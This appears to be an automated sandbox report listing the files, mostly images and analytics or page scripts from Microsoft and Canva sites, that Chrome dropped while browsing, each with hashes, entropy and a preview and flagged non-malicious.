                                                                                                                                                              Preview:RIFF....WEBPVP8 .....^...*..8.>...A..fS6..a,...<E...e../.%.-.-CU.o.t8........w!......[..........^.../...O4..._..w.......@...n..s............m...?..&}....?.............o._......3......?....d...........O._......e./......._...?..K.C.......g.......?s.........S.w...........L.=.......k.G..r..........e...o.....?................_...?....E...............?.{[...........g....].......?.... .O.../._......'....'.......?........C._......)./...?.^.u>H......?..]...s...o....o..................G..._.?..?...G.............?._.?....I....~...k.....?@...o....._.?....K.i.....O...R.....o..?..z.....C.......?..g...w....?.....}...........~...._...'.....?....X......._..........._.....w.......O......e..........q..=~w.........[...O....._......}...2......T1._............*..j.p.5zG.}.....q-..J.S*../..eC.E.;.......gm.J.........Ml\\*}.v../..eC.E.=L.c...6.D..x-.[.......$Nsz...@.....ggv.W.|.KB......}...2....9.c}...2-..q..R..r3...p+az.8..9q....l.....i#E....[.co...._...k7.>T.g....B9Wf..dh...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1664x1062, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):150420
                                                                                                                                                              Entropy (8bit):7.997411420101247
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:592629F820EB33288EA8F3739A56D5CB
                                                                                                                                                              SHA1:639A45261825E5CB8667E091EF17AA3DED2DE863
                                                                                                                                                              SHA-256:94069C4E0065C6857459CB402E6144771FF5354B2074807E22D0AF2F36C30852
                                                                                                                                                              SHA-512:740EDA6727C385484A162E82056806C6229B3DDE557C9E9D93A7B2AFF37D2E94AB4F5B5D02F0A1125EB8E638348369C9ACA5AC2A86BB9D5F75D021F5067042A4
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF.K..WEBPVP8 .K.......*..&.>...A..Zs...a,...... ~.......-m..lin....A....t..5^..}....=R...K.....\.....D..........N.'~.s..}.~O.?...~.G.......q~....o...?....'.../.....c.....w.g......_.?......!................O...._.?.~.|..Y.o...../..................;....._...?........w.g.............C_............?..........................o....?....u.....'._....i...........'...o........}...*...........2.......#...h._...#..................{...?.......M._.?'=.......?.._...k...o.?.~B.x.........<.F...s.....?......w...ox...s.../._.f.x..}...........`...k....._....*~y.G.W.........?....o..............C.W.O..n......7......./.?............._......#..........(..................!.{...O........o.........'./.....?......m~....Ke&t_.".I...RgE.",....O,...uki.j.k...b.....h.*.^..UJ.V`......d<.q.R.(.5.....J.)w.m.4.|..f....."-...~..e&t_.".I.t..l.,./.....Ai......v.O.G..O.".E....6..%.".. .k..ac.!....7../.D..D[)3.....L.DE....Y...O..o.Q.#..1%.*...f,....t..1...~...X.lNC..........{B..-
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:C++ source, ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):3116
                                                                                                                                                              Entropy (8bit):4.431505373285771
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:B884EF4864D6867BD00AA4A7A5CFB368
                                                                                                                                                              SHA1:D45D8BD33632588A913575910B3D0EABD5AD3828
                                                                                                                                                              SHA-256:177F6B14CEB87D301946D00124195EBB755A452BA40ABCA5CF6A4E77E52222F5
                                                                                                                                                              SHA-512:375A8412459BBE64B6024C462D996B4B48DE246997BA36F5E26379F163D5FACA69CECC79E4FD246F92079A23DCD36AC2E8058D2C9663BA9D31C07C6786269581
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:/*.*Utility class for handling data storage in the browser's local storage with encoding/decoding support..*Note: This class is designed for storing and retrieving objects in local storage. .*/ ..class LocalStorageUtil {. constructor(opts) {. // Set the storage key from options, defaulting to an empty object. this.storageKey = opts.storageKey || {}; . }. . /**. * Encode the value before storing in local storage. */. encodeValue = (value) => {. if(!value) {. return {};. }. . let encodedValue;. try {. encodedValue = window.btoa(JSON.stringify(value));. } catch(error) {. encodedValue = value. }. return encodedValue;. };. . /**. * Decode the value retrieved from local storage. */. decodeValue = (encodedValue) => {. if(!encodedValue) {. return {};. }. let decodedValue;. try {. decodedValue = window.atob(encodedValue); // Decode the encoded value.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (534)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):3288
                                                                                                                                                              Entropy (8bit):4.844125421768654
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:7677F65C1626AB1BDE509437776D4291
                                                                                                                                                              SHA1:E51C5E64E5ED9D95FFA2BB31B821229F4502BDA9
                                                                                                                                                              SHA-256:76607654EAFACC56092479AD570B118BE287CB2341711030CE47A88AAEC760D2
                                                                                                                                                              SHA-512:5A110A93A5B34B11D371140D59738C5659F2A54614F84C4E683D115E50852DEC3640A8CEE6F394D8584684E0C355C249F5636329B0AC03E73949DEC9423C2652
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:'use strict';const oc={event:{cookiesPostConsent:{name:"oc.event.cookiesPostConsent",lastdispatched:void 0,dispatch:function(){oc.event.cookiesPostConsent.lastdispatched=Date.now();document.dispatchEvent(new Event(oc.event.cookiesPostConsent.name))},onChanged:function(a){"function"==typeof a&&("undefined"==typeof oc.event.cookiesPostConsent.lastdispatched?document.addEventListener(oc.event.cookiesPostConsent.name,()=>{a()}):a())}},marketSelector:{name:"oc.event.marketSelector",lastInit:void 0,dispatch:function(a,.b){oc.event.marketSelector.lastInit=Date.now();var c=document.createEvent("CustomEvent");c.initCustomEvent(oc.event.marketSelector.name,!0,!0,{eventName:a,value:b});document.dispatchEvent(c)},onInit:function(a){"function"==typeof a&&("undefined"==typeof oc.event.marketSelector.lastdispatched?document.addEventListener(oc.event.marketSelector.name,b=>{"oninit"===b.detail.eventName&&a()}):a())},onSelect:function(a){document.addEventListener(oc.event.marketSelector.name,b=>{"onsel
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):170
                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://cm.g.doubleclick.net/pixel?google_nid=g8f47s39e399f3fe&google_push&google_sc&google_hm=WjF5eVV3QUFBSklOSkFPLQ==
                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (10026), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):10026
                                                                                                                                                              Entropy (8bit):5.547492208446643
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:14CC808391ADCD1021EE431405A2BF0A
                                                                                                                                                              SHA1:041E0E332C0E33730C236A86BFFC9121FB042FEF
                                                                                                                                                              SHA-256:03B505104E3E8B5C4333F9EC004CF9847664A2115AE0044A26E00F9FD0DE7F70
                                                                                                                                                              SHA-512:96C5DC52761A2AD77D538242C2BDF69E4E0DB96700A81585FB8D3397E23A98462E93B20E6E348AB90955227704DD507B3A48F599CF6B236B85D37F43963A4C90
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:COMSCORE.SiteRecruit.Broker.config={sv:"scor",cddsDomains:"",cddsInProgress:"",domainSwitch:"",domainMatch:"",delay:0,cddsIntervalMax:10,crossDomainCheck:function(){1<this.cddsIntervalMax?(this.cddsIntervalMax--,!1!==COMSCORE.SiteRecruit.Utils.UserPersistence.getCookieValue(this.cddsInProgress)&&(setInterval(function(){COMSCORE.SiteRecruit.DDKeepAlive.setDDTrackerCookie()},1e3),COMSCORE.SiteRecruit._halt=!0,COMSCORE.SiteRecruit.Utils.UserPersistence.createCookie("srCDDS","1",{path:"/",domain:COMSCORE.SiteRecruit.Broker.config.cookie.domain,duration:"s"}),this.clearCrossDomainCheck())):this.clearCrossDomainCheck()},clearCrossDomainCheck:function(){window.clearInterval(crossDomainInterval)},isolateDomain:function(e){return e=(e=e.substring(e.indexOf("//")+2,e.length)).substring(0,e.indexOf("/"))},addEventDelay:1e3,isWindowOpener:!0,cookie:{name:"msresearch",path:"/",domain:".microsoft.com",duration:90},tracker:{ssl:"https://www.microsoft.com/library/svy/SiteRecruit_Tracker.htm"},mobile:{
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):57676
                                                                                                                                                              Entropy (8bit):7.995902953703909
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:C6C716B5972F08C12D5357545FB885B4
                                                                                                                                                              SHA1:F884192B151060CB365FFCD93B78CA7B11B374E6
                                                                                                                                                              SHA-256:7800C3A493E2BDCF5C03A4BAAB411D9196F9404358356F4788B54E576244A0D1
                                                                                                                                                              SHA-512:8AE04A19CAB819B197B0CECBDFDDBF94A9A73391AC713ABB5B5AD9337C23E297B3E946A311C27F39F55B5731407E4999AC292332E272052002E8768ADEB5218F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/ProductOverview_WhyPBI_2.3?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=95&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................2...(iinf..........infe........av01Color....jiprp...Kipco....ispe...........&....pixi............av1C........colrnclx...........ipma..................:mdat.....*..%..B2....,.M4.A$@....p...,p..D*.u......6.M.v8hJ.Q2 .C..`..:./M/.!90..j....p.......j..|..S...m....0.9.!..9.-x.j-FH.....rQi..A..e!...B(..u|..<`".....{......+..:-..C...#\<_.:Wb.Ow......_nAg.<o.4.e.`e..nFe..K.....z..@8....@...$)........7..U8_.._.8.>.*.@..pfv..nC..4..\.I.<.X5o.]0.......*2b..|..mty.>.....pOs.3....B9..0.V....rxV.......e:....+_....@..6..J.4}..M.Y<..%...C....=.6$;.....S... .......E.ww?..s.G.u....^..HU...S....&......m.M.Z"5.aQW..=.ietA.. ./#..k...].+............l%..c...@...8..q.....x........0..................2.^.Y.z.......<....YL....N%..7..Y/":.-.Qh `..a1.18q.......0..>.....j.K..}.E..,.#.E.... )wf.+.\..y...R(...."OdO.....9.as.A.G.....{.:...?.Z4_.9%O...Eh.p
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (1096)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8688
                                                                                                                                                              Entropy (8bit):5.400879314555088
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:2943769E571AEBFDAAD72E2FB735856A
                                                                                                                                                              SHA1:A9A5D5CE9B672061C432D75DE614F646424B2658
                                                                                                                                                              SHA-256:5B3942800F99A879B349B921C2AD6CB5C42E44C4C7484094C88197409FECF5EE
                                                                                                                                                              SHA-512:1AEC57FC55BAE61E6D79245B5E03341EC2085D090AC0AF09441995491C293BF40D6F59D8A274D48180D611E81909DFE796E808B4FA63DB9EE84D1DD96C8CE4B4
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[8661],{../***/ 284457:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(399744);__web_req__(46468);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {var X=__c.X;var Y=__c.Y;var G=__c.G;.var Rq=async function(a,b){const c=__c.Lf(__c.Kf([Pq,"createBatch"])),[d,{wh:e}]=await Promise.all([__c.lg(a.xb,c,Qq.Y(b),{Fb:"recordanalyticseventbatch"}),__webpack_require__.me(577033).then(()=>({wh:__c.oq}))]);return e.L(d)},Tq=async function(a,b){const c=__c.Lf(__c.Kf([Pq,"create"])),[d,{yh:e}]=await Promise.all([__c.lg(a.xb,c,Sq.Y(b),{Fb:"recordanalyticsevent"}),__webpack_require__.me(577033).then(()=>({yh:__c.nq}))]);return e.L(d)},Xq=function(a){a=[a];let b=0;for(;a.length;){const c=a.pop();.if(void 0!==c)switch(typeof c){case "boolean":b+=Uq;break;case "string
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (1489)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1636
                                                                                                                                                              Entropy (8bit):5.177766977445915
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:8BF48BF7CD4BA2A59BF3DB4812FA5EAF
                                                                                                                                                              SHA1:40719B665731E7FC7A6CC97B966604D611EC074C
                                                                                                                                                              SHA-256:4731D82C0015582D07C9F0943A05C7AB8CD76FE88A71CF690B5DDCB18B8A6784
                                                                                                                                                              SHA-512:D71DF672B861C8CE6EDBE02ADEDF519A4D4708CCDDB781E84A231ED05996A47AEECDCFE21DD240E2E9F60B9E7AE704C4AD708C2CA9DC0E301CF89AF2F230A9F8
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:// For license information, see `https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/0c4dbba778f5/RC86580b4b76fc4faca2bf443d92c6b256-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/0c4dbba778f5/RC86580b4b76fc4faca2bf443d92c6b256-source.min.js', "!function(){function r(r,e){if(e)for(var t=0;t<e.length;t++)if(window.location.pathname.startsWith(e[t]))return;if(window.location.pathname.startsWith(r)){var n=document.querySelector(\"[role=main]\")||document.querySelector(\"#mainContent\"),o=document.createElement(\"div\");o.innerHTML=\"<div id='ruBanner' style='background:#0067b8; text-align:center;padding:10px;color:#fff'>\"+u+\"</div>\",n&&null==document.getElementById(\"ruBanner\")&&n.prepend(o)}}var u=\"\\u041c\\u0430\\u0439\\u043a\\u0440\\u043e\\u0441\\u043e\\u0444\\u0442 \\u043f\\u0440\\u0438\\u043e\\u0441\\u0442\\u0430\\u043d\\u043e\\u0432\\u0438\\u043b \\u0432\\u0441\\u0435 \\u043d\\u043e\\u0432\\u044b\\u0435 \\u043f\\u0440\\u043e\\u0
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (779)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2634
                                                                                                                                                              Entropy (8bit):5.434243762500824
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:E67DF942266E32C9698B39583D69F84B
                                                                                                                                                              SHA1:C3A035A15A7A030C3595931B3F9354FD572EF701
                                                                                                                                                              SHA-256:D0AF6B558898043F4B2BBFEC3D6EE38244C80582F75C27209714CE9C3989D561
                                                                                                                                                              SHA-512:0AE0EA4048D977B49BB377759110B920BEB6FADBB98C408A8A6F4402030998A9E9C90B25E3D07A87E477BF2EC38D1E279E9B23A99918450141EC3F2455350D15
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[609],{../***/ 175766:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(399744);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {var Hr=function(a,b){a.dataLayer.push({event:"consent_state",consent:{essential:"yes",functionality:Gr(b.Nf),performance:Gr(b.performance),targeting:Gr(b.Ue),social_media:Gr(b.Wg),gtm_yandex:Gr(b.uj),gtm_amazon:Gr(b.ij),gtm_outbrain:Gr(b.qj),gtm_spotify:Gr(b.sj),gtm_qs:Gr(b.rj),gtm_tiktok_session:Gr(b.tj),gtm_fpc_engagement_event:Gr(b.mj),gtm_innovid:Gr(b.oj),gtm_ben_605:Gr(b.jj),gtm_dicbo:Gr(b.kj),gtm_fpc_rtid:Gr(b.nj),gtm_metadata:Gr(b.pj)}})},Jr=function(a){var b=a.D,c=a.qa,d,e,f;var g={app_name:null===.(d=c.app)||void 0===d?void 0:d.name,product_variant:null===(e=c.app)||void 0===e?void 0:e.variant,experience:b.Ea,count
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (24837)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):24949
                                                                                                                                                              Entropy (8bit):5.2312828786862395
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:CDAC009AA733269D648461499E0869F2
                                                                                                                                                              SHA1:C74BBB5EDC41B9DB60EF45262DF964E7E60A3272
                                                                                                                                                              SHA-256:2E38BC618D4A4277FE6D05DA9272A916D12515FB4533C600A4EAE77F68007437
                                                                                                                                                              SHA-512:1C9F4CF40DEB7D5E7FA83B3DEE4D5B5AAADCB5A20AEF61DCE2B4A0A1037225E5FB3493F92BCE40F04A02CA9EB791F1AFE6F28A47E3D72F432B2DDF61F3AF45E7
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:// For license information, see `https://assets.adobedtm.com/5ef092d1efb5/d6d76b37b476/launch-41185cd0b005.js`..window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2024-02-14T10:24:39Z",turbineBuildDate:"2023-02-22T20:37:26Z",turbineVersion:"27.5.0"},environment:{id:"ENe5ac16c0abde4e0db8a4cd055e2bbf71",stage:"production"},dataElements:{cachebuster:{defaultValue:"",cleanText:!0,storageDuration:"pageview",modulePath:"core/src/lib/dataElements/randomNumber.js",settings:{max:1e6,min:1}}},extensions:{core:{displayName:"Core",hostedLibFilesBaseUrl:"https://assets.adobedtm.com/extensions/EP2e2f86ba46954a2b8a2b3bb72276b9f8/",modules:{"core/src/lib/dataElements/randomNumber.js":{name:"random-number",displayName:"Random Number",script:function(e){"use strict";e.exports=function(e){var n=Math.ceil(e.min),t=Math.floor(e.max);return n>t?NaN:Math.floor(Math.random()*(t-n+1))+n}}}}}},company:{orgId:"EA76ADE95776D2EC7F000101@AdobeOrg",dynamicCdnEnable
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (309), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):309
                                                                                                                                                              Entropy (8bit):4.971196656935236
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:D7106DB242C2B41F88A1B02418BEC7E2
                                                                                                                                                              SHA1:7A445118F0B5712744AA4AED6889B28C1E7779F7
                                                                                                                                                              SHA-256:044527A735B287BD84D2AE6D2D3B89C85B52C9750BB07E5AEF19FB8F28F0442B
                                                                                                                                                              SHA-512:C493FBD6926006108E56E23BB204BFE59A7364ED6D2409B5B258D9EA6C060259E13A7E7A22021607F6EDD55EEA52C75DFE7FCF18BB76D6E539FBD763BF399185
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:'use strict';var DynamicClientSideScriptHandler=function(){return{fetchScriptLink:function(b){var a=(a=document.querySelector('div[data-identifier\x3d"'+b+'"]'))?a.getAttribute("data-content"):null;null===a&&(a=(b=document.querySelector('meta[name\x3d"'+b+'"]'))?b.getAttribute("content"):null);return a}}}();
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):193730
                                                                                                                                                              Entropy (8bit):7.99897247884239
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:526408385B713A2A1FADB189963F86FC
                                                                                                                                                              SHA1:FA8F08566D9A15E0824F043B6A1CDA06A82E8176
                                                                                                                                                              SHA-256:E065EF0060C99DA4BA094F3154AAE663B883CAAABEC193BA0E1CBD4D38EFAF02
                                                                                                                                                              SHA-512:4AFFB4A93AE405EEE7245E936189F224C14429CC47775AC9E688D14ED5C64C05CF96138A49D456CCF3AD7FEB94B45C9010BDF95F7F5016024B49F9740FD929E7
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Product_Overview_CopilotinPBI_3.2?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=95&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............+H...(iinf..........infe........av01Color....jiprp...Kipco....ispe...........&....pixi............av1C........colrnclx...........ipma.................+Pmdat.....*..%..B2....0.......$wI..H.J...dlYD...L..B<..Z..h...]...{..v/..).....A..YE.=>z..ir.....q.....H.....B./.RR.[.}ez...L.....a9.l.s[|Q..'..p...<.d.}....B.v...L....x...L|.8#..g6.Y]n..3......7...D.kO..h.:.&-./...;..;2....w.1.d.ll.zG,SYI....n...N"R4q..,..v..^...<n...aJ.Ki.]}.(.NJB$tA[.e..>}r'.[`..._&..Vl....a.eo..?bw#m... +.<`..<"...C..n..U.....p?....s.........[......W....7......TG...r..&.#.u....0......'zOFf.=...7RT5.v.a.A{...x._/.a..).....d.>sQ.3b...|....1.T...v.4.bY.K...o>..uN..@.a.G....b..)...............58>^..n.9.....c....n....^."/..l....H./.._Hl..u.II".$....q.u.0#..Aw~x.}.z@...q....c..8.x........Z..m.d..)..T..?..K.....9..d.9..R4.}..z.....4..im.J.J....K/...p...e.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):159
                                                                                                                                                              Entropy (8bit):4.661188988961239
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:C22EA5B46F3FCAD90DA0ABCC0A3F73D4
                                                                                                                                                              SHA1:2DB789C63AFB63D98932D7B55907DC3508E318B4
                                                                                                                                                              SHA-256:8334DAA260516BB896407461E5F10E8E3041B06C56846BBB9D3435C6E77513AD
                                                                                                                                                              SHA-512:A0359F8C25DC40CEFFD14A41BA81794717B99DABE78CBF8A8678F3E3EC57F317388CA0DC55B1CC6AD2D6C13D2B3CAEB5A64527BB2C646ED2D93775437DA646F1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/structure/page/clientlibs/featurecontrol.min.ACSHASHc22ea5b46f3fcad90da0abcc0a3f73d4.js
                                                                                                                                                              Preview:'use strict';function isFeatureEnabled(b){var a=document.getElementById("customFeatureControl").getAttribute("enabledFeatures");return null!=a&&a.includes(b)};
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2824
                                                                                                                                                              Entropy (8bit):7.882148211425719
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:65A14021973F40BB78257CFA37CE29A7
                                                                                                                                                              SHA1:2F42F162578B98079D37A50CC831931C36300401
                                                                                                                                                              SHA-256:D4EE5C009004EAC6A06A769932416F3D278F30D8E5C972D4FA780490AAA76E4E
                                                                                                                                                              SHA-512:9214518850211B1BBA8D2ABAC1ADCDAA12521D84525ED6DD599405AF304EACE6562C2FAB2E95745339969DCC7E409CD21508E3369B41CC66F99C3B4102516FD8
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF....WEBPVP8X........t..'..ALPH.....W..m.H...^...H[...V(....`...s.M.%.Y_.."./ (....IjP....pzX/.3.v.d..#..,.h...E.9l2...'..H.....H...RAXi...o.....[.........o...[......f....VP8 J...pJ...*u.(.>..$....v..\..;.!.7..~.V.......>el.}....9p./j_`.R...S.........rO0....f.A...s.'./p.....t>.?....V...3...3...iy..v........?d.O.*.?..'....!.[.........o`.._.<.>l...G..`_..=..m~.{...,8..k.c.....C...+P..s(F.*..&......."V.s..P..U.4MH^...d.=IO.\K.q.%....\K.q.%....\K.q.%....\K.q,.71'f3.m.....+..H...\K.q-...^Y.Y...q.%...../.......2+..r....n.^Su....F.x.....#......,5.Bi$..j....4.%>.q.%.....rWI.0 .:..n. .9.{*./...9Y<ORS...^Rq.b..W.m..eX.....@..%....T..L%:..~.W_....q.%.7...1f....ir............\K.q.%.|0r\U.......M.a.....J.....%....\K.q.%....\K.q.%....\K.q.%....\K.q.%....\K.......+......_....C..C.nr..D.\.y...a8j.&z.v.J....W'0.q.Yk."?).D..t.?~.jz..%...V...=..O.._.M.HZ..M...`'..d..#.E1.^.t..`1.MU.T8..].`+...]....V.F.....cH..<.-..s.?s.HE.!.#94. ."Bi=..&kL9......0.....U.K=m:.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (509)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):775
                                                                                                                                                              Entropy (8bit):5.006726191017576
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:FE68B59E840A1A274393B3AB03C85E96
                                                                                                                                                              SHA1:C8C1B1196B05E9ADB6D342390956A231920B2017
                                                                                                                                                              SHA-256:9F01AEA27D73C422AC5E7E87C2F7F3CE364E1F940FAEB6CF3178B5E13CB43497
                                                                                                                                                              SHA-512:58921A6195363008A3DD65AF8D115828C3F93FB23CCCC9FB5D2FAF7AF55F5779EFBA947B990DEDF5B2751F3ED0BA4071F006873FFB68F77CCA3C8D565092A90D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:'use strict';(function(e){e.addEventListener("DOMContentLoaded",()=>{const a=$(".faq-collapse"),f={"bi-bhvr":{off:a.data("expandbhvr"),on:a.data("collapsebhvr")},"bi-cn":{off:a.data("expand"),on:a.data("collapse")},"bi-ecn":{off:a.data("enexpand"),on:a.data("encollapse")},"bi-ct":{off:a.data("expandtemplatename"),on:a.data("collapsetemplatename")}},d=b=>{const g=b.triggerElement.classList.contains("collapsed");Object.entries(f).forEach(([h,c])=>{b.triggerElement.setAttribute(`data-${h}`,g?c.off:c.on)})},.k=window.ocrReimagine.CollapseExtension.getInstances().filter(b=>b.triggerElement.classList.contains("ocr-faq-item__header"));0<a.length&&k.forEach(b=>{b.el.addEventListener("onHidden",d.bind(this,b));b.el.addEventListener("onShown",d.bind(this,b))})})})(document);
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1664x1062, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):146226
                                                                                                                                                              Entropy (8bit):7.997694543603218
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:B97761E549040D7E832B6AA6BF30783F
                                                                                                                                                              SHA1:9AF7330FFAFDC5CF471137AA5D35B9EB71C8F8E8
                                                                                                                                                              SHA-256:9674A7831F49D490289CF2D1620B9BF2662603E5A32CA02580AA68230D66702F
                                                                                                                                                              SHA-512:32AF504310D027CB66691A0E24258D6203E236C513FBA895FBF135C05BFE3CC246C7E9A80E63F2A4919A91FCF9A21C7506266E6D62415A0F48FE51ABDD7EC01F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
